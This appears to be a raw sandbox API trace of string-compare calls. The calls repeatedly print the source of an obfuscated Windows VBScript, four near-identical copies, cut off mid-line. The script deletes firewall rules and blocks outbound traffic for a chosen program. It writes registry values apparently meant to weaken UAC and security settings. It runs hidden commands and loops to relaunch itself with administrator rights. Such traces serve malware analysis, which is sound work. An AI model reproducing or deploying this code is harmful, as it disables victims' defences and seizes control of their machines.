policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.319] wcsncmp (_String1="n criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.319] wcsncmp (_String1=" criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.319] wcsncmp (_String1="criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.319] wcsncmp (_String1="riarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 